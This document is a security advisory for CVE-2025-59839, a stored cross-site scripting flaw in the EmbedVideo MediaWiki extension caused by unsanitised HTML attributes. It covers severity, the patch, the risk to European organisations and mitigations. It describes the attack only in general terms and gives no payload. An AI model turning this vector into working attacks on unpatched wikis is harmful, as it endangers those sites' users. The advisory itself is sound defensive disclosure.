CVE-2025-59839 is a high-severity stored Cross-Site Scripting (XSS) vulnerability affecting the EmbedVideo extension (versions 4.0.0 and prior) for MediaWiki, specifically used by the StarCitizenWiki project. The EmbedVideo extension provides a parser function (#ev) and parser tags to embed video clips from various video sharing platforms within MediaWiki pages. The vulnerability arises because the extension allows arbitrary attributes to be added to HTML elements without proper input sanitization or neutralization. This improper handling of user-supplied input leads to the possibility of injecting malicious scripts into wiki pages, which are then stored and served to other users. When a victim views a compromised page, the malicious script executes in their browser context, potentially leading to session hijacking, credential theft, or unauthorized actions performed on behalf of the user. The vulnerability does not require any authentication or user interaction to be exploited, and it can be triggered remotely over the network. The CVSS 3.1 base score of 8.6 reflects the high impact on confidentiality (complete compromise of user data), low impact on integrity, and low impact on availability, with low attack complexity and no privileges or user interaction required. The issue has been addressed in a patch (commit 4e075d3), which properly sanitizes input to prevent arbitrary attribute injection. No known exploits are currently reported in the wild, but the vulnerability's nature and severity make it a significant risk for MediaWiki installations using the vulnerable EmbedVideo extension version.

For European organizations, this vulnerability poses a substantial risk, especially for those operating public-facing or internal MediaWiki-based knowledge bases or documentation portals that utilize the EmbedVideo extension. Exploitation could lead to unauthorized access to sensitive information, including user credentials and internal documentation, through session hijacking or theft of authentication tokens. The stored XSS can also be leveraged to perform actions on behalf of authenticated users, potentially leading to privilege escalation or data manipulation. Organizations in sectors such as government, finance, healthcare, and critical infrastructure, which often rely on MediaWiki for collaborative documentation, could face reputational damage, regulatory penalties under GDPR for data breaches, and operational disruptions. The vulnerability's ability to be exploited without authentication increases the attack surface, making it easier for attackers to compromise systems remotely. Additionally, the presence of embedded video content is common in modern documentation, increasing the likelihood of this extension's deployment and thus the exposure risk.

European organizations should immediately audit their MediaWiki installations to identify the presence and version of the EmbedVideo extension. If version 4.0.0 or earlier is in use, an urgent upgrade to the patched version should be performed. If an upgrade is not immediately feasible, organizations should consider disabling the EmbedVideo extension temporarily to eliminate the attack vector. Implement strict input validation and output encoding policies on wiki content, especially for user-generated content that can include HTML attributes. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts in browsers. Regularly monitor wiki pages for suspicious content or unexpected attribute injections. Additionally, enforce least privilege principles for wiki users, limiting editing rights to trusted personnel to reduce the risk of malicious content insertion. Conduct security awareness training for wiki administrators and users to recognize and report suspicious behavior. Finally, keep MediaWiki and all extensions up to date with security patches to mitigate similar vulnerabilities.